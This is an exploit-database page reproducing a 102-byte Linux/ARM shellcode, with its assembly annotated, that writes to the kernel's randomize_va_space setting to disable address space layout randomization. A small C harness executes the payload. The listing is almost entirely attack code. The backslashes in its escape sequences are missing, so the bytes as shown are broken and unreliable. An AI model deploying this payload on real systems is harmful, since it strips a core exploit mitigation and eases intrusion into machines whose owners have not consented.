[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux/ARM - Disable ASLR Security - 102 bytes
# Published : 2010-06-30
# Author :
# Previous Title : Linux/x86-32 - ConnectBack with SSL connection - 422 bytes
# Next Title : Write-to-file Shellcode (Win32)
/*
Title: Linux/ARM - Disable ASLR Security - 102 bytes
Date: 2010-06-20
Tested: Linux ARM9 2.6.28-6-versatile
Author: Jonathan Salwan
Web: http://shell-storm.org | http://twitter.com/jonathansalwan
! Database of shellcodes http://www.shell-storm.org/shellcode/
Description:
============
Address space layout randomization (ASLR) is a computer security technique
which involves randomly arranging the positions of key data areas, usually
including the base of the executable and position of libraries, heap, and
stack, in a process's address space.
This shellcode disables the ASLR on linux/ARM
*/
#include <stdio.h>
char *SC = "x01x30x8fxe2" // add r3, pc, #1
"x13xffx2fxe1" // bx r3
"x24x1b" // subs r4, r4, r4
"x20x1c" // adds r0, r4, #0
"x17x27" // movs r7, #23
"x01xdf" // svc 1
"x78x46" // mov r0, pc
"x2ex30" // adds r0, #46
"xc8x21" // movs r1, #200
"xc8x31" // adds r1, #200
"xc8x31" // adds r1, #200
"xc8x31" // adds r1, #200
"xc8x31" // adds r1, #200
"x59x31" // adds r1, #89
"xc8x22" // movs r2, #200
"xc8x32" // adds r2, #200
"x14x32" // adds r2, #20
"x05x27" // movs r7, #5
"x01xdf" // svc 1
"x03x20" // movs r0, #3
"x79x46" // mov r1, pc
"x0ex31" // adds r1, #14
"x02x22" // movs r2, #2
"x04x27" // movs r7, #4
"x01xdf" // svc 1
"x92x1a" // subs r2, r2, r2
"x10x1c" // adds r0, r2, #0
"x01x27" // movs r7, #1
"x01xdf" // svc 1
"x30x0a" // ^
"x2dx2d" // |
"x2fx2f" // |
"x70x72" // |
"x6fx63" // |
"x2fx73" // |
"x79x73" // |
"x2fx6b" // |
"x65x72" // |
"x6ex65" // | [ strings ]
"x6cx2f" // |
"x72x61" // |
"x6ex64" // |
"x6fx6d" // |
"x69x7a" // |
"x65x5f" // |
"x76x61" // |
"x5fx73" // |
"x70x61" // |
"x63x65"; // v
int main(void)
{
fprintf(stdout,"Length: %dn",strlen(SC));
(*(void(*)()) SC)();
return 0;
}